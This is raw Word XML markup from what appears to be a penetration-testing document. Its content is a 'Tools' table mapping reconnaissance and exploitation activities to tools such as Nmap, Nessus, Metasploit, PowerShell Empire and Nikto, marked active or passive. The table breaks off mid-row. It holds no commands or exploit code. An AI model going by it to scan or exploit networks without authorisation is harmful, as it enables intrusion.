    <w:p w:rsidR="00D14B6E" w:rsidRDefault="00D14B6E" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D14B6E" w:rsidRDefault="00D14B6E" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D14B6E" w:rsidRDefault="00D14B6E" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00347D98" w:rsidRDefault="00347D98" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00347D98" w:rsidRDefault="00347D98" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00D14B6E" w:rsidP="00D14B6E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D14B6E" w:rsidRDefault="00D14B6E" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9282" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2049"/>
        <w:gridCol w:w="2144"/>
        <w:gridCol w:w="2022"/>
        <w:gridCol w:w="3067"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="243"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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14B6E" w:rsidRPr="009D4D6C" w:rsidRDefault="00D14B6E" w:rsidP="00930238">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidRDefault="00D14B6E" w:rsidP="00930238">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>tool / database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidRDefault="00D14B6E" w:rsidP="00930238">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>active / passive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidRDefault="00D14B6E" w:rsidP="00930238">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="486"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Dns Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Dig / Nslookup / dnsbrute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Dns Emumeration from normal lookups to zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="352"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Snmp Sweeps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Snmpwalk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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SNMP Sweep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="511"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Port / Service Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="316"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Vulnerability Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Nessus / Qualys / Nexpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active Vulnerability Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Multiple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Metasploit Discovery Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Both (depends on Module)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="243"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Service and Host Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Wireshark / TCPDump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Passive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Packet capture, of inbound and outbound</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="754"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Windows Network</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Net commands (Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Active (Required being joined</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>to domain)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Leverage SMB / AD traffic to enumerate hosts and services within a windows network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="572"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Windows Network</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Powershell Empire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Active (but traffic looks</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>like normal AD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Leverage SMB / AD traffic to enumerate hosts within a windows network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="742"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Network Service</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
